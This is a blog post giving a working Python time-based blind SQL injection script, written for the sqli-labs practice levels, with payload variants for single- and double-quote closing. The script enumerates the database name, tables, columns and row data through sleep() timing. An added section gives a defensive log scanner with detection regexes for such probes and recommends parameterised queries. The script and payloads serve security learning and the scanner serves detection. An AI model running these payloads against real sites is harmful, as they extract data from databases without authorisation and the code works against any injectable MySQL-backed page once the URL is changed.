
Time-based blind injection script

Time: 2023-01-18 16:14:23  Views: 33  
Tags: script name database datetime time table blind-injection payload sleep

This is a small time-based blind injection script. For the sqli-labs levels before Less-17 you can basically run it as-is after changing the URL; the only thing to watch is the quote-closing style, which differs between levels, so swap in the matching payload variant in the script and it will produce results. I wrote it in a hurry, so it has no comments.

    #coding:utf-8
    import requests
    import datetime
    
    """
    k controls LIMIT (which row is being read)
    i controls SUBSTR (which character position, 1-based)
    j controls the character / ASCII code being guessed
    
    payload :
        single-quote closing:
            guess database name length:
            payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
            guess database name:
            payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
            guess table names:
            payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
            guess column names:
            payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
            dump data:
            payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
    
        double-quote closing:
            guess database name length:
            payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
            guess database name:
            payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
            guess table names:
            payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
            guess column names:
            payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
            dump data:
            payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
    """
    
    url = 'http://192.168.1.6/sqli-labs/Less-10/index.php'
    
    
    def timed_get(payload):
        """Send one request and return the whole seconds it took.
    
        Only the elapsed time carries information here: the page content is
        identical for a true and a false guess, so the response body is ignored.
        """
        time1 = datetime.datetime.now()
        requests.get(url + payload)
        time2 = datetime.datetime.now()
        return (time2 - time1).seconds
    
    
    def database_len():
        # Ask "is the length greater than i?" for increasing i; the first i that
        # does NOT trigger the delay is the length itself. Lengths of 15 or more
        # are not covered by this range and would return 14.
        for i in range(1, 15):
            payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' % i
            #payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" % i
            print(i)
            if timed_get(payload) < 2:
                break
        print('database_len:', i)
        return i
    
    
    def database_name(length):
        # One position at a time, try every character of the alphabet until the
        # request is delayed; that character is the one at position i.
        name = ''
        for i in range(1, length + 1):
            for j in '0123456789abcdefghijklmnopqrstuvwxyz':
                payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i, j)
                #payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i, j)
                if timed_get(payload) >= 3:
                    name += j
                    print(name)
                    break
        print('database_name:', name)
        return name
    
    
    def table_name():
        # k walks the rows of information_schema.tables (up to 6 tables),
        # i the character position (substr is 1-based, so start at 1),
        # j the ASCII code in the printable range 'A'..'z'.
        name = ''
        for k in range(6):
            for i in range(1, 10):
                for j in range(65, 123):
                    payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
                    #payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
                    if timed_get(payload) >= 3:
                        name += chr(j)
                        print(chr(j))
                        break
            print("table_name:", name)
            name = ''
    
    
    def column_name(table_name):
        # Same idea as table_name(), restricted to the columns of one table.
        name = ''
        for k in range(6):
            for i in range(1, 10):
                for j in range(65, 123):
                    payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
                    #payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
                    if timed_get(payload) >= 3:
                        name += chr(j)
                        print(chr(j))
                        break
            print("column_name:", name)
            name = ''
    
    
    def data(column, table):
        # Read one column of one table, row by row, character by character.
        name = ''
        for k in range(6):
            for i in range(1, 10):
                for j in range(65, 123):
                    payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column, table, k, i, j)
                    #payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column, table, k, i, j)
                    if timed_get(payload) >= 2:
                        name += chr(j)
                        print(chr(j))
                        break
            print("data:", name)
            name = ''
    
    
    if __name__ == '__main__':
        length = database_len()
        database_name(length)
        table_name()
        column_name('users')
        # data('username', 'users')
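Seen from the defender's side, a probe like the one above leaves a very recognisable trail in the web server's access log: a burst of requests from one client whose query-string values contain a delay function, a conditional and a string-extraction function, and whose response time matches the `sleep()` argument exactly when the guess is right. The following is an added example, not part of the original post, that scans log lines for that signature. The log lines are constructed (nginx "combined" format with `$request_time` appended as the last field), and the client addresses, thresholds and the `analyze_request` / `scan_log` names are all assumptions made for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines: combined format plus $request_time at the end.
# The payload shapes mirror the ones the script above sends; the last line is a
# slow but legitimate request, to show that latency alone does not raise a flag.
SAMPLE_LOG = """\
192.168.1.20 - - [18/Jan/2023:16:10:01 +0800] "GET /sqli-labs/Less-10/index.php?id=1 HTTP/1.1" 200 712 0.011
192.168.1.20 - - [18/Jan/2023:16:10:03 +0800] "GET /sqli-labs/Less-10/index.php?id=1%22%20and%20if(length(database())%3E1,sleep(2),0)%20--+ HTTP/1.1" 200 712 2.004
192.168.1.20 - - [18/Jan/2023:16:10:06 +0800] "GET /sqli-labs/Less-10/index.php?id=1%22%20and%20if(substr(database(),1,1)=%22s%22,sleep(3),1)%20--+ HTTP/1.1" 200 712 3.002
192.168.1.21 - - [18/Jan/2023:16:11:00 +0800] "GET /sqli-labs/Less-10/index.php?id=2 HTTP/1.1" 200 690 0.009
192.168.1.20 - - [18/Jan/2023:16:11:09 +0800] "GET /sqli-labs/Less-10/index.php?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101,sleep(3),0)%20--+ HTTP/1.1" 200 712 3.001
192.168.1.22 - - [18/Jan/2023:16:12:00 +0800] "GET /report.php?range=last%20year HTTP/1.1" 200 5120 1.870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<rt>[\d.]+)$'
)

# Indicator classes a time-based blind probe needs. One class alone is weak
# evidence (a parameter may legitimately contain '#'); several together are not.
INDICATORS = {
    "delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
    "branch": re.compile(r"\bif\s*\(|\bcase\s+when\b", re.I),
    "extract": re.compile(r"\b(substr|substring|mid|ascii|ord)\s*\(", re.I),
    "metadata": re.compile(r"\binformation_schema\.", re.I),
    "comment": re.compile(r"--(\s|$)|#|/\*"),
    "quote_break": re.compile(r"""^\d+\s*['"]"""),
}


def analyze_request(target):
    """Decode the query string of one request target; return {param: [tags]}."""
    hits = {}
    # parse_qsl percent-decodes and turns '+' into a space, so '--+' becomes '-- '.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        matched = [tag for tag, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(text, delay_threshold=1.0, min_score=2):
    """Return (findings, per_client) for the given log text.

    A request is flagged when at least `min_score` indicator classes match one
    parameter. Elapsed time is used only as corroboration: a probe that hits the
    true branch takes about sleep() seconds, which is what `delay_confirmed` marks.
    """
    findings = []
    per_client = defaultdict(lambda: {"probes": 0, "slow_probes": 0, "params": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        scored = {p: tags for p, tags in analyze_request(m["target"]).items()
                  if len(tags) >= min_score}
        if not scored:
            continue
        rt = float(m["rt"])
        confirmed = rt >= delay_threshold and any("delay" in t for t in scored.values())
        findings.append({"ip": m["ip"], "ts": m["ts"], "params": scored,
                         "request_time": rt, "delay_confirmed": confirmed})
        client = per_client[m["ip"]]
        client["probes"] += 1
        client["slow_probes"] += int(confirmed)
        client["params"].update(scored)
    return findings, dict(per_client)


if __name__ == "__main__":
    found, clients = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["params"], "%.3fs" % f["request_time"],
              "DELAY CONFIRMED" if f["delay_confirmed"] else "")
    for ip, c in clients.items():
        print(ip, "probes=%d slow=%d params=%s" % (c["probes"], c["slow_probes"], sorted(c["params"])))
```

The per-client summary is the useful alerting unit: a single flagged request can be a scanner or a false positive, but dozens of `id` probes from one address whose latency tracks the `sleep()` argument is the enumeration loop above in progress. On the application side the condition that makes any of this work is string-concatenated SQL; a parameterised query removes it regardless of quoting style.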

From: https://www.cnblogs.com/qianyuzz/p/17060050.html
